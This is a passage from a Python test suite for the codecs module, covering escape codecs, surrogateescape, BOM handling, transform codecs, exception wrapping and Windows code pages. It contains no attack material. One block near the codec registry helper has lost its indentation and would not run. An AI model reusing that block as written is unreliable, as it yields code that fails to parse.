            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: sys.maxunicode, 1: b, 2: c}),
            (chr(sys.maxunicode) + "bc", 3)
        )
        # A code point above sys.maxunicode is a TypeError, not a decode error.
        self.assertRaises(TypeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: sys.maxunicode + 1, 1: b, 2: c}
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: a, 1: b},
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: a, 1: b, 2: 0xFFFE},
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: a, 1: b}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: a, 1: b, 2: 0xFFFE}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: a, 1: b}),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: a, 1: b, 2: 0xFFFE}),
            ("ab", 3)
        )
@yp_unittest.skip_str_codecs
class WithStmtTest(yp_unittest.TestCase):
    """Verify codec stream wrappers work as context managers."""

    def test_encodedfile(self):
        raw = io.BytesIO(b"\xc3\xbc")
        with codecs.EncodedFile(raw, "latin-1", "utf-8") as ef:
            self.assertEqual(ef.read(), b"\xfc")

    def test_streamreaderwriter(self):
        raw = io.BytesIO(b"\xc3\xbc")
        info = codecs.lookup("utf-8")
        with codecs.StreamReaderWriter(raw, info.streamreader,
                                       info.streamwriter, 'strict') as srw:
            self.assertEqual(srw.read(), "\xfc")
@yp_unittest.skip_str_codecs
class TypesTest(yp_unittest.TestCase):
    """Input-type checks for the low-level codec entry points."""

    def test_decode_unicode(self):
        # Most decoders don't accept unicode input
        decoders = [
            codecs.utf_7_decode,
            codecs.utf_8_decode,
            codecs.utf_16_le_decode,
            codecs.utf_16_be_decode,
            codecs.utf_16_ex_decode,
            codecs.utf_32_decode,
            codecs.utf_32_le_decode,
            codecs.utf_32_be_decode,
            codecs.utf_32_ex_decode,
            codecs.latin_1_decode,
            codecs.ascii_decode,
            codecs.charmap_decode,
        ]
        if hasattr(codecs, "mbcs_decode"):
            decoders.append(codecs.mbcs_decode)
        for decoder in decoders:
            self.assertRaises(TypeError, decoder, "xxx")

    def test_unicode_escape(self):
        # Escape-decoding a unicode string is supported and gives the same
        # result as decoding the equivalent ASCII bytes string.
        self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
        self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class UnicodeEscapeTest(yp_unittest.TestCase):
    """Tests for the unicode_escape codec (encode and decode directions)."""

    def test_empty(self):
        self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))

    def test_raw_encode(self):
        # Printable ASCII (except backslash) encodes to itself.
        encode = codecs.unicode_escape_encode
        for b in range(32, 127):
            if b != b'\\'[0]:
                self.assertEqual(encode(chr(b)), (bytes([b]), 1))

    def test_raw_decode(self):
        # Any byte other than backslash decodes to the same code point.
        decode = codecs.unicode_escape_decode
        for b in range(256):
            if b != b'\\'[0]:
                self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))

    def test_escape_encode(self):
        encode = codecs.unicode_escape_encode
        check = coding_checker(self, encode)
        check('\t', br'\t')
        check('\n', br'\n')
        check('\r', br'\r')
        check('\\', br'\\')
        # Other controls and non-ASCII Latin-1 become \xNN escapes.
        for b in range(32):
            if chr(b) not in '\t\n\r':
                check(chr(b), ('\\x%02x' % b).encode())
        for b in range(127, 256):
            check(chr(b), ('\\x%02x' % b).encode())
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')

    def test_escape_decode(self):
        decode = codecs.unicode_escape_decode
        check = coding_checker(self, decode)
        check(b"[\\\n]", "[]")
        check(br'[\"]', '["]')
        check(br"[\']", "[']")
        check(br"[\\]", "[\\]")
        check(br"[\a]", "[\x07]")
        check(br"[\b]", "[\x08]")
        check(br"[\t]", "[\x09]")
        check(br"[\n]", "[\x0a]")
        check(br"[\v]", "[\x0b]")
        check(br"[\f]", "[\x0c]")
        check(br"[\r]", "[\x0d]")
        check(br"[\7]", "[\x07]")
        check(br"[\8]", r"[\8]")
        check(br"[\78]", "[\x078]")
        check(br"[\41]", "[!]")
        check(br"[\418]", "[!8]")
        check(br"[\101]", "[A]")
        check(br"[\1010]", "[A0]")
        check(br"[\x41]", "[A]")
        check(br"[\x410]", "[A0]")
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")
        # Unrecognized escapes are passed through with the backslash kept.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567xuUN':
                check(b'\\' + bytes([b]), '\\' + chr(b))

    def test_decode_errors(self):
        # Truncated \x, \u, \U escapes in strict/ignore/replace modes.
        decode = codecs.unicode_escape_decode
        for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        # Code points above U+10FFFF are rejected.
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class RawUnicodeEscapeTest(yp_unittest.TestCase):
    """Exhaustive encode/decode tests for the raw-unicode-escape codec.

    Unlike unicode-escape, only \\u and \\U sequences are special; every
    other byte (including backslash pairs) passes through unchanged.
    """
    def test_empty(self):
        """Empty input maps to empty output with consumed length 0."""
        self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))
    def test_raw_encode(self):
        """Every Latin-1 code point encodes to its own byte."""
        encode = codecs.raw_unicode_escape_encode
        for b in range(256):
            self.assertEqual(encode(chr(b)), (bytes([b]), 1))
    def test_raw_decode(self):
        """Every byte decodes to the same code point."""
        decode = codecs.raw_unicode_escape_decode
        for b in range(256):
            self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
    def test_escape_encode(self):
        """Only non-Latin-1 characters produce \\u/\\U escapes."""
        encode = codecs.raw_unicode_escape_encode
        check = coding_checker(self, encode)
        for b in range(256):
            if b not in b'uU':
                check('\\' + chr(b), b'\\' + bytes([b]))
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')
    def test_escape_decode(self):
        """Backslash followed by anything but u/U is passed through."""
        decode = codecs.raw_unicode_escape_decode
        check = coding_checker(self, decode)
        for b in range(256):
            if b not in b'uU':
                check(b'\\' + bytes([b]), '\\' + chr(b))
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")
    def test_decode_errors(self):
        """Truncated \\u/\\U escapes raise UnicodeDecodeError and honor the
        "ignore" and "replace" error handlers."""
        decode = codecs.raw_unicode_escape_decode
        for c, d in (b'u', 4), (b'U', 4):
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        # Code points above U+10FFFF are rejected.
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class SurrogateEscapeTest(yp_unittest.TestCase):
    """Tests for the "surrogateescape" error handler: undecodable bytes map
    to lone surrogates U+DC80..U+DCFF and round-trip back on encoding."""
    def test_utf8(self):
        # One plain bad byte, and an ill-formed UTF-8 encoded surrogate;
        # each must round-trip exactly through decode then encode.
        for raw, text in [
            (b"foo\x80bar", "foo\udc80bar"),
            (b"\xed\xb0\x80", "\udced\udcb0\udc80"),
        ]:
            self.assertEqual(raw.decode("utf-8", "surrogateescape"), text)
            self.assertEqual(text.encode("utf-8", "surrogateescape"), raw)
    def test_ascii(self):
        # A non-ASCII byte becomes a lone surrogate and back.
        raw, text = b"foo\x80bar", "foo\udc80bar"
        self.assertEqual(raw.decode("ascii", "surrogateescape"), text)
        self.assertEqual(text.encode("ascii", "surrogateescape"), raw)
    def test_charmap(self):
        # \xa5 is unmapped in iso-8859-3, so it escapes to \udca5 and back.
        raw, text = b"foo\xa5bar", "foo\udca5bar"
        self.assertEqual(raw.decode("iso-8859-3", "surrogateescape"), text)
        self.assertEqual(text.encode("iso-8859-3", "surrogateescape"), raw)
    def test_latin1(self):
        # Issue6373
        self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
                         b"\xe4\xeb\xef\xf6\xfc")
@yp_unittest.skip_str_codecs
class BomTest(yp_unittest.TestCase):
    """Check BOM emission of the UTF-16/UTF-32 stream writers: the BOM must
    be written exactly once, re-written after seek(0), and never written
    after a seek to a non-zero position."""
    def test_seek0(self):
        """Exercise write/seek interleavings on a temp file for each
        BOM-producing encoding, via both the file object and its
        underlying StreamWriter."""
        data = "1234567890"
        tests = ("utf-16",
                 "utf-16-le",
                 "utf-16-be",
                 "utf-32",
                 "utf-32-le",
                 "utf-32-be")
        self.addCleanup(support.unlink, support.TESTFN)
        for encoding in tests:
            # Check if the BOM is written only once
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # Check that the BOM is written after a seek(0)
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data[0])
                self.assertNotEqual(f.tell(), 0)
                f.seek(0)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # (StreamWriter) Check that the BOM is written after a seek(0)
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data[0])
                self.assertNotEqual(f.writer.tell(), 0)
                f.writer.seek(0)
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # Check that the BOM is not written after a seek() at a position
            # different than the start
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.seek(f.tell())
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # (StreamWriter) Check that the BOM is not written after a seek()
            # at a position different than the start
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data)
                f.writer.seek(f.writer.tell())
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
# bytes<->bytes "transform" codecs that are always importable.
bytes_transform_encodings = ["base64_codec", "uu_codec", "quopri_codec", "hex_codec"]
# Short aliases accepted for each transform codec.
transform_aliases = dict(
    base64_codec=["base64", "base_64"],
    uu_codec=["uu"],
    quopri_codec=["quopri", "quoted_printable", "quotedprintable"],
    hex_codec=["hex"],
    rot_13=["rot13"],
)
# The compression codecs are only tested when the backing module imports;
# `zlib` stays bound (possibly to None) because a skipUnless guard uses it.
try:
    import zlib
except ImportError:
    zlib = None
else:
    bytes_transform_encodings.append("zlib_codec")
    transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
    import bz2
except ImportError:
    pass
else:
    bytes_transform_encodings.append("bz2_codec")
    transform_aliases["bz2_codec"] = ["bz2"]
@yp_unittest.skip_str_codecs
class TransformCodecTest(yp_unittest.TestCase):
    """Tests for the bytes<->bytes transform codecs listed in
    ``bytes_transform_encodings`` (base64, uu, quopri, hex, plus zlib/bz2
    when available).

    The regex message strings below use raw literals: ``\\(`` inside a
    plain string literal is an invalid escape sequence (SyntaxWarning
    since Python 3.12), which is the defect fixed here.
    """
    def test_basics(self):
        """Encoding then decoding via the generic interface round-trips."""
        binput = bytes(range(256))
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                # generic codecs interface
                (o, size) = codecs.getencoder(encoding)(binput)
                self.assertEqual(size, len(binput))
                (i, size) = codecs.getdecoder(encoding)(o)
                self.assertEqual(size, len(o))
                self.assertEqual(i, binput)
    def test_read(self):
        """StreamReader.read() decodes a transform-encoded stream."""
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                sin = codecs.encode(b"\x80", encoding)
                reader = codecs.getreader(encoding)(io.BytesIO(sin))
                sout = reader.read()
                self.assertEqual(sout, b"\x80")
    def test_readline(self):
        """StreamReader.readline() decodes a transform-encoded stream."""
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                sin = codecs.encode(b"\x80", encoding)
                reader = codecs.getreader(encoding)(io.BytesIO(sin))
                sout = reader.readline()
                self.assertEqual(sout, b"\x80")
    def test_buffer_api_usage(self):
        # We check all the transform codecs accept memoryview input
        # for encoding and decoding
        # and also that they roundtrip correctly
        original = b"12345\x80"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                data = original
                view = memoryview(data)
                data = codecs.encode(data, encoding)
                view_encoded = codecs.encode(view, encoding)
                self.assertEqual(view_encoded, data)
                view = memoryview(data)
                data = codecs.decode(data, encoding)
                self.assertEqual(data, original)
                view_decoded = codecs.decode(view, encoding)
                self.assertEqual(view_decoded, data)
    def test_text_to_binary_blacklists_binary_transforms(self):
        # Check binary -> binary codecs give a good error for str input
        bad_input = "bad input type"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                fmt = (r"{!r} is not a text encoding; "
                       r"use codecs.encode\(\) to handle arbitrary codecs")
                msg = fmt.format(encoding)
                with self.assertRaisesRegex(LookupError, msg) as failure:
                    bad_input.encode(encoding)
                # The blacklisting must not be implemented via chaining.
                self.assertIsNone(failure.exception.__cause__)
    def test_text_to_binary_blacklists_text_transforms(self):
        # Check str.encode gives a good error message for str -> str codecs
        msg = (r"^'rot_13' is not a text encoding; "
               r"use codecs.encode\(\) to handle arbitrary codecs")
        with self.assertRaisesRegex(LookupError, msg):
            "just an example message".encode("rot_13")
    def test_binary_to_text_blacklists_binary_transforms(self):
        # Check bytes.decode and bytearray.decode give a good error
        # message for binary -> binary codecs
        data = b"encode first to ensure we meet any format restrictions"
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                encoded_data = codecs.encode(data, encoding)
                fmt = (r"{!r} is not a text encoding; "
                       r"use codecs.decode\(\) to handle arbitrary codecs")
                msg = fmt.format(encoding)
                with self.assertRaisesRegex(LookupError, msg):
                    encoded_data.decode(encoding)
                with self.assertRaisesRegex(LookupError, msg):
                    bytearray(encoded_data).decode(encoding)
    def test_binary_to_text_blacklists_text_transforms(self):
        # Check str -> str codec gives a good error for binary input
        for bad_input in (b"immutable", bytearray(b"mutable")):
            with self.subTest(bad_input=bad_input):
                msg = (r"^'rot_13' is not a text encoding; "
                       r"use codecs.decode\(\) to handle arbitrary codecs")
                with self.assertRaisesRegex(LookupError, msg) as failure:
                    bad_input.decode("rot_13")
                self.assertIsNone(failure.exception.__cause__)
    @yp_unittest.skipUnless(zlib, "Requires zlib support")
    def test_custom_zlib_error_is_wrapped(self):
        # Check zlib codec gives a good error for malformed input
        msg = "^decoding with 'zlib_codec' codec failed"
        with self.assertRaisesRegex(Exception, msg) as failure:
            codecs.decode(b"hello", "zlib_codec")
        self.assertIsInstance(failure.exception.__cause__,
                              type(failure.exception))
    def test_custom_hex_error_is_wrapped(self):
        # Check hex codec gives a good error for malformed input
        msg = "^decoding with 'hex_codec' codec failed"
        with self.assertRaisesRegex(Exception, msg) as failure:
            codecs.decode(b"hello", "hex_codec")
        self.assertIsInstance(failure.exception.__cause__,
                              type(failure.exception))
    # Unfortunately, the bz2 module throws OSError, which the codec
    # machinery currently can't wrap :(
    # Ensure codec aliases from http://bugs.python.org/issue7475 work
    def test_aliases(self):
        """Every alias in transform_aliases resolves to its canonical codec."""
        for codec_name, aliases in transform_aliases.items():
            expected_name = codecs.lookup(codec_name).name
            for alias in aliases:
                with self.subTest(alias=alias):
                    info = codecs.lookup(alias)
                    self.assertEqual(info.name, expected_name)
    def test_uu_invalid(self):
        # Missing "begin" line
        self.assertRaises(ValueError, codecs.decode, b"", "uu-codec")
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple seach functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
# Issue #22166: Also need to clear the internal cache in CPython
from _codecs import _forget_codec
except ImportError:
def _forget_codec(codec_name):
pass
@yp_unittest.skip_str_codecs
class ExceptionChainingTest(yp_unittest.TestCase):
    """Check that exceptions raised inside codec calls are wrapped (chained)
    with a message naming the operation and codec — but only "stateless"
    exceptions whose only significant data is their type and one str arg.

    Fixes applied: the two regex message strings in
    test_unflagged_non_text_codec_handling were split across a raw and a
    non-raw literal; ``\\(`` in a plain literal is an invalid escape
    sequence (SyntaxWarning since Python 3.12), so both halves are raw now.
    """
    def setUp(self):
        # There's no way to unregister a codec search function, so we just
        # ensure we render this one fairly harmless after the test
        # case finishes by using the test case repr as the codec name
        # The codecs module normalizes codec names, although this doesn't
        # appear to be formally documented...
        # We also make sure we use a truly unique id for the custom codec
        # to avoid issues with the codec cache when running these tests
        # multiple times (e.g. when hunting for refleaks)
        unique_id = repr(self) + str(id(self))
        self.codec_name = encodings.normalize_encoding(unique_id).lower()
        # We store the object to raise on the instance because of a bad
        # interaction between the codec caching (which means we can't
        # recreate the codec entry) and regrtest refleak hunting (which
        # runs the same test instance multiple times). This means we
        # need to ensure the codecs call back in to the instance to find
        # out which exception to raise rather than binding them in a
        # closure to an object that may change on the next run
        self.obj_to_raise = RuntimeError
    def tearDown(self):
        _TEST_CODECS.pop(self.codec_name, None)
        # Issue #22166: Also pop from caches to avoid appearance of ref leaks
        encodings._cache.pop(self.codec_name, None)
        try:
            _forget_codec(self.codec_name)
        except KeyError:
            pass
    def set_codec(self, encode, decode):
        """Install encode/decode callables under this test's codec name."""
        codec_info = codecs.CodecInfo(encode, decode,
                                      name=self.codec_name)
        _TEST_CODECS[self.codec_name] = codec_info
    @contextlib.contextmanager
    def assertWrapped(self, operation, exc_type, msg):
        """Assert the block raises exc_type wrapped with a chained cause."""
        full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
            operation, self.codec_name, exc_type.__name__, msg)
        with self.assertRaisesRegex(exc_type, full_msg) as caught:
            yield caught
        self.assertIsInstance(caught.exception.__cause__, exc_type)
        self.assertIsNotNone(caught.exception.__cause__.__traceback__)
    def raise_obj(self, *args, **kwds):
        # Helper to dynamically change the object raised by a test codec
        raise self.obj_to_raise
    def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
        """Verify obj_to_raise gets wrapped for all four codec entry points."""
        self.obj_to_raise = obj_to_raise
        self.set_codec(self.raise_obj, self.raise_obj)
        with self.assertWrapped("encoding", exc_type, msg):
            "str_input".encode(self.codec_name)
        with self.assertWrapped("encoding", exc_type, msg):
            codecs.encode("str_input", self.codec_name)
        with self.assertWrapped("decoding", exc_type, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertWrapped("decoding", exc_type, msg):
            codecs.decode(b"bytes input", self.codec_name)
    def test_raise_by_type(self):
        self.check_wrapped(RuntimeError, "")
    def test_raise_by_value(self):
        msg = "This should be wrapped"
        self.check_wrapped(RuntimeError(msg), msg)
    def test_raise_grandchild_subclass_exact_size(self):
        msg = "This should be wrapped"
        class MyRuntimeError(RuntimeError):
            __slots__ = ()
        self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
    def test_raise_subclass_with_weakref_support(self):
        msg = "This should be wrapped"
        class MyRuntimeError(RuntimeError):
            pass
        self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
    def check_not_wrapped(self, obj_to_raise, msg):
        """Verify "stateful" exceptions propagate unwrapped."""
        def raise_obj(*args, **kwds):
            raise obj_to_raise
        self.set_codec(raise_obj, raise_obj)
        with self.assertRaisesRegex(RuntimeError, msg):
            "str input".encode(self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            codecs.encode("str input", self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertRaisesRegex(RuntimeError, msg):
            codecs.decode(b"bytes input", self.codec_name)
    def test_init_override_is_not_wrapped(self):
        class CustomInit(RuntimeError):
            def __init__(self):
                pass
        self.check_not_wrapped(CustomInit, "")
    def test_new_override_is_not_wrapped(self):
        class CustomNew(RuntimeError):
            def __new__(cls):
                return super().__new__(cls)
        self.check_not_wrapped(CustomNew, "")
    def test_instance_attribute_is_not_wrapped(self):
        msg = "This should NOT be wrapped"
        exc = RuntimeError(msg)
        exc.attr = 1
        self.check_not_wrapped(exc, "^{}$".format(msg))
    def test_non_str_arg_is_not_wrapped(self):
        self.check_not_wrapped(RuntimeError(1), "1")
    def test_multiple_args_is_not_wrapped(self):
        msg_re = r"^\('a', 'b', 'c'\)$"
        self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
    # http://bugs.python.org/issue19609
    def test_codec_lookup_failure_not_wrapped(self):
        msg = "^unknown encoding: {}$".format(self.codec_name)
        # The initial codec lookup should not be wrapped
        with self.assertRaisesRegex(LookupError, msg):
            "str input".encode(self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            codecs.encode("str input", self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            b"bytes input".decode(self.codec_name)
        with self.assertRaisesRegex(LookupError, msg):
            codecs.decode(b"bytes input", self.codec_name)
    def test_unflagged_non_text_codec_handling(self):
        # The stdlib non-text codecs are now marked so they're
        # pre-emptively skipped by the text model related methods
        # However, third party codecs won't be flagged, so we still make
        # sure the case where an inappropriate output type is produced is
        # handled appropriately
        def encode_to_str(*args, **kwds):
            return "not bytes!", 0
        def decode_to_bytes(*args, **kwds):
            return b"not str!", 0
        self.set_codec(encode_to_str, decode_to_bytes)
        # No input or output type checks on the codecs module functions
        encoded = codecs.encode(None, self.codec_name)
        self.assertEqual(encoded, "not bytes!")
        decoded = codecs.decode(None, self.codec_name)
        self.assertEqual(decoded, b"not str!")
        # Text model methods should complain
        fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
               r"use codecs.encode\(\) to encode to arbitrary types$")
        msg = fmt.format(self.codec_name)
        with self.assertRaisesRegex(TypeError, msg):
            "str_input".encode(self.codec_name)
        fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
               r"use codecs.decode\(\) to decode to arbitrary types$")
        msg = fmt.format(self.codec_name)
        with self.assertRaisesRegex(TypeError, msg):
            b"bytes input".decode(self.codec_name)
@yp_unittest.skipUnless(sys.platform == 'win32',
                        'code pages are specific to Windows')
@yp_unittest.skip_str_codecs
class CodePageTest(yp_unittest.TestCase):
    """Tests for the Windows code page codecs
    (codecs.code_page_encode / codecs.code_page_decode)."""
    # CP_UTF8 is already tested by CP65001Test
    CP_UTF8 = 65001
    def test_invalid_code_page(self):
        """Negative code pages raise ValueError; unknown ones raise OSError."""
        self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
        self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
        self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
        self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
    def test_code_page_name(self):
        """Error messages mention the code page ('cp932', 'CP_UTF8', ...)."""
        self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
            codecs.code_page_encode, 932, '\xff')
        self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
            codecs.code_page_decode, 932, b'\x81\x00')
        self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
            codecs.code_page_decode, self.CP_UTF8, b'\xff')
    def check_decode(self, cp, tests):
        """Run (raw, errors, expected) decode cases against code page cp.

        expected is None when the call must raise UnicodeDecodeError.
        """
        for raw, errors, expected in tests:
            if expected is not None:
                try:
                    decoded = codecs.code_page_decode(cp, raw, errors)
                except UnicodeDecodeError as err:
                    self.fail('Unable to decode %a from "cp%s" with '
                              'errors=%r: %s' % (raw, cp, errors, err))
                self.assertEqual(decoded[0], expected,
                                 '%a.decode("cp%s", %r)=%a != %a'
                                 % (raw, cp, errors, decoded[0], expected))
                # assert 0 <= decoded[1] <= len(raw)
                self.assertGreaterEqual(decoded[1], 0)
                self.assertLessEqual(decoded[1], len(raw))
            else:
                self.assertRaises(UnicodeDecodeError,
                    codecs.code_page_decode, cp, raw, errors)
    def check_encode(self, cp, tests):
        """Run (text, errors, expected) encode cases against code page cp.

        expected is None when the call must raise UnicodeEncodeError.
        """
        for text, errors, expected in tests:
            if expected is not None:
                try:
                    encoded = codecs.code_page_encode(cp, text, errors)
                except UnicodeEncodeError as err:
                    self.fail('Unable to encode %a to "cp%s" with '
                              'errors=%r: %s' % (text, cp, errors, err))
                self.assertEqual(encoded[0], expected,
                                 '%a.encode("cp%s", %r)=%a != %a'
                                 % (text, cp, errors, encoded[0], expected))
                self.assertEqual(encoded[1], len(text))
            else:
                self.assertRaises(UnicodeEncodeError,
                    codecs.code_page_encode, cp, text, errors)
    def test_cp932(self):
        """cp932 (Shift-JIS variant) round trips and error handlers."""
        self.check_encode(932, (
            ('abc', 'strict', b'abc'),
            ('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
            # test error handlers
            ('\xff', 'strict', None),
            ('[\xff]', 'ignore', b'[]'),
            ('[\xff]', 'replace', b'[y]'),
            ('[\u20ac]', 'replace', b'[?]'),
            ('[\xff]', 'backslashreplace', b'[\\xff]'),
            ('[\xff]', 'xmlcharrefreplace', b'[&#255;]'),
        ))
        self.check_decode(932, (
            (b'abc', 'strict', 'abc'),
            (b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
            # invalid bytes
            (b'[\xff]', 'strict', None),
            (b'[\xff]', 'ignore', '[]'),
            (b'[\xff]', 'replace', '[\ufffd]'),
            (b'[\xff]', 'surrogateescape', '[\udcff]'),
            (b'\x81\x00abc', 'strict', None),
            (b'\x81\x00abc', 'ignore', '\x00abc'),
            (b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
        ))
    def test_cp1252(self):
        """cp1252 (Western European) round trips and error handlers."""
        self.check_encode(1252, (
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict',  b'\xe9\x80'),
            ('\xff', 'strict', b'\xff'),
            ('\u0141', 'strict', None),
            ('\u0141', 'ignore', b''),
            ('\u0141', 'replace', b'L'),
        ))
        self.check_decode(1252, (
            (b'abc', 'strict', 'abc'),
            (b'\xe9\x80', 'strict', '\xe9\u20ac'),
            (b'\xff', 'strict', '\xff'),
        ))
    def test_cp_utf7(self):
        """Code page 65000 (UTF-7) round trips, including surrogates."""
        cp = 65000
        self.check_encode(cp, (
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict',  b'+AOkgrA-'),
            ('\U0010ffff', 'strict', b'+2//f/w-'),
            ('\udc80', 'strict', b'+3IA-'),
            ('\ufffd', 'strict', b'+//0-'),
        ))
        self.check_decode(cp, (
            (b'abc', 'strict', 'abc'),
            (b'+AOkgrA-', 'strict', '\xe9\u20ac'),
            (b'+2//f/w-', 'strict', '\U0010ffff'),
            (b'+3IA-', 'strict', '\udc80'),
            (b'+//0-', 'strict', '\ufffd'),
            # invalid bytes
            (b'[+/]', 'strict', '[]'),
            (b'[\xff]', 'strict', '[\xff]'),
        ))
    def test_multibyte_encoding(self):
        """Error handlers apply per character in multibyte sequences."""
        self.check_decode(932, (
            (b'\x84\xe9\x80', 'ignore', '\u9a3e'),
            (b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
        ))
        self.check_decode(self.CP_UTF8, (
            (b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
            (b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
        ))
        if VISTA_OR_LATER:
            self.check_encode(self.CP_UTF8, (
                ('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
                ('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
            ))
    def test_incremental(self):
        """With final=False, a trailing partial sequence is left unconsumed."""
